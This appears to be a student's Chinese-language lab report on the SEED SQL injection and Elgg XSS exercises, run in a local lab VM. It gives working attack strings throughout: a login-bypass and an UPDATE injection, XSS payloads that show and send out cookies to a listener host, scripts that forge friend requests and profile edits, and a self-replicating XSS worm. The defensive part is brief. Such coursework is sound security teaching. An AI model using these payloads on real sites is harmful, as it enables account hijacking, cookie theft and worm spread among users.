返回顶部

20212909 2021-2022-2 《网络攻防实践》实践十报告

20212909 2021-2022-2 《网络攻防实践》实践十报告

一、实践内容

  • 1.SEED SQL注入攻击与防御实验
    我们已经创建了一个Web应用程序,并将其托管在www.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:
    熟悉SQL语句: 我们已经创建了一个名为Users的数据库,其中包含一个名为creditential的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn等)。在此任务中,您需要使用数据库来熟悉SQL查询。
    对SELECT语句的SQL注入攻击:上述Web应用存在SQL输入漏洞,任务是在不知道密码的情况下登陆该Web应用程序。
    对UPDATE语句的SQL注入攻击:通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
    SQL对抗:修复上述SQL注入攻击漏洞。
  • 2.SEED XSS跨站脚本攻击实验(Elgg)
    为了演示攻击者可以利用XSS漏洞做什么,我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中,学生需要利用此漏洞对经过修改的Elgg发起XSS攻击,攻击的最终目的是在用户之间传播XSS蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。
    发布恶意消息,显示警报窗口:在您的Elgg配置文件中嵌入一个JavaScript程序,以便当另一个用户查看您的配置文件时,将执行JavaScript程序并显示一个警报窗口。
    弹窗显示cookie信息:将cookie信息显示。
    窃取受害者的cookies:将cookie发送给攻击者。
    成为受害者的朋友:使用js程序加受害者为朋友,无需受害者干预,使用相关的工具了解Elgg加好友的过程。
    修改受害者的信息:使用js程序使得受害者在访问Alice的页面时,资料无需干预却被修改。
    编写XSS蠕虫。
    对抗XSS攻击。

实践环境:SEED_UbuntuU 16.04.2 LTS

二、实践过程

  • SEED SQL注入攻击与防御实验
    1.输入命令mysql -u root -p登录mysql,密码:seedubuntu。

    2.输入show databases;查看所有数据库。

    3.输入use Users,使用Users这个库,输入show tables查看所有的表。

    4.输入select * from credential;查看credential这张表的所有内容。

    5.输入select * from credential where Name='Alice';以name=Alice为条件,查看Alice的所有信息

    6.打开浏览器,输入www.SEEDLabSQLInjection.com,进入WEB界面,按F12查看源代码,然后在登录框随便输入一些信息。


    可以看到,WEB将信息发送到了unsafe_home.php。
    7.在浏览器界面输入/var/www/SQLInjection/unsafe_home.php命令,将文件保存下来,打开查看源码。

    发现其关键代码的sql语句。
    8.构造sql语句Admin'#作为登录名,#代表将后边的输入密码的部分注释掉,密码部分为空,登录成功。


    9.进入管理界面,将Admin的工资改为12345,同样的方法,发现在管理界面输入的参数,传到了unsafe_edit_backend界面,在浏览器输入/var/www/SQLInjection/unsafe_edit_backend.php,将文件保存至本地,打开查看其源码。




    10.构造sql语句',Salary='12345' where name='Admin';#,输入到NickName一栏,保存,工资修改成功

  • SEED XSS跨站脚本攻击实验(Elgg)
  • 发布恶意消息,显示警报窗口
    1.点击如图按钮,进入xss Lab site,登录Alice账号,密码:seedalice。

    2.如图顺序进入编辑Alice信息界面,在Brief Description一栏输入<script>alert("XSS");</script>,保存,返回之前的界面2,出现弹窗,攻击成功。



  • 弹窗显示 cookie 信息
    3.在Brief Description一栏输入<script>alert(document.cookie);</script>,保存,返回之前的界面2,出现cookie信息弹窗,攻击成功。

  • 窃取受害者的 cookies
    4.查看本机IP地址,在Brief Description一栏输入<script>document.write('<img src=http://192.168.200.14:5555?c='+escape(document.cookie)+'>');alert("xss success");</script>,在终端输入nc -l 5555 -v命令监听5555端口,保存Alice的信息后,监听到cookie信息,攻击成功。


  • 成为受害者的朋友
    5.在浏览器输入http://www.xsslabelgg.com/profile/boby,查看Boby界面,查看网页源码,点击Add friend界面,发现信息发往了http://www.xsslabelgg.com/action/friends/add?friend=45&__elgg_ts=1652732463&__elgg_token=DA14ZydedxoMfoG1CbgYo
    构造JS代码
<script type="text/javascript">
window.onload = function () {
    var Ajax = null;
    var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
    var token = "&__elgg_token=" + elgg.security.token.__elgg_token;

  	var sendurl = "http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token; 

	  //发送 Ajax 请求
	  Ajax = new XMLHttpRequest();
	  Ajax.open("GET", sendurl, true);
	  Ajax.setRequestHeader("Host", "www.xsslabelgg.com");
	  Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
	  Ajax.send();
}
</script>


在Alice的编辑界面的About me 一栏输入构造的JS代码,注意是Visual editor 界面,保存。

6.登录Boby账号,密码:seedboby。

访问Alice界面http://www.xsslabelgg.com/profile/alice,刷新Boby账号,发现Boby已自动添加Alice为好友,攻击成功。

  • 修改受害者的信息
    7.查看编辑Alice信息界面的源码,编辑About me内容,发现访问了http://www.xsslabelgg.com/action/profile/edit
    构造JS代码
<script type="text/javascript">
    window.onload = function(){
        var userName=elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;

        var content= token + ts + "name=" + userName + "&description=<p>this had been changed by xss attack.</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
        var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
        alert(content)
        //FILL IN
        var samyGuid=44;
        //FILL IN
        if(elgg.session.user.guid!=samyGuid)
        {
            var Ajax=null;
            Ajax=new XMLHttpRequest();
            Ajax.open("POST",sendurl,true);
            Ajax.setRequestHeader("Host","www.xsslabelgg.com");
            Ajax.setRequestHeader("Content-Type",
            "application/x-www-form-urlencoded");
            Ajax.send(content);
        }
	}
</script>


在Alice的编辑界面的About me 一栏输入构造的JS代码,注意是Visual editor 界面,保存。


8.登录Boby账号,密码:seedboby。访问Alice界面后刷新,发现Boby的About me 被攻击成功。

  • 编写XSS蠕虫
    9.登录Alice界面,修改About me 内容,构造JS代码
<script id="worm" type="text/javascript">
    window.onload = function(){
        var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
        var jsCode = document.getElementById("worm").innerHTML;
        var tailTag = "</" + "script>"; 
        var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);

        var userName=elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;

        //Construct the content of your url.
        var content= token + ts + "&name=" + userName + "&description=<p>this page had been changed by xss attack  "+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
        var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
        alert(content)

        var samyGuid=44;

        if(elgg.session.user.guid!=samyGuid){
            var Ajax=null;
            Ajax=new XMLHttpRequest();
            Ajax.open("POST",sendurl,true);
            Ajax.setRequestHeader("Host","www.xsslabelgg.com");
            Ajax.setRequestHeader("Content-Type",
            "application/x-www-form-urlencoded");
            Ajax.send(content);
        }
    }
</script>

在Alice的编辑界面的About me 一栏输入构造的JS代码,注意是Visual editor 界面,保存。
10.登录Boby账号,密码:seedboby。访问Alice界面后刷新,发现Boby的About me 被攻击成功,登录Samy账号,密码:seedsamy,访问Boby页面http://www.xsslabelgg.com/profile/boby,刷新Samy页面,Samy的About me 内容也被修改,蠕虫攻击成功。



  • XXS对抗
    11.登录Admin账号,密码:seedelgg,按如图顺序选择plugins,点击HTMLawed,使它不可用。




    12.重新登录Alicez账号,密码:seedalice,发现代码显示到了About me,攻击失效。

三、问题和解决方法

P1:Admin的账号密码视频中没有。
Solu1:从同学那得知,但不知道他们怎么知道的。

四、感想

通过本次实验,学习到了一些SQL注入攻击与防御实验的方法和技巧,以及如何通过Web信息,构造SEED XSS跨站脚本来进行攻击,了解了其基本原理,但是想要真正对成熟的Web框架构成攻击,还是要学习更多的东西。

posted @ 2022-05-17 21:44  秋之白华  阅读(188)  评论(0编辑  收藏  举报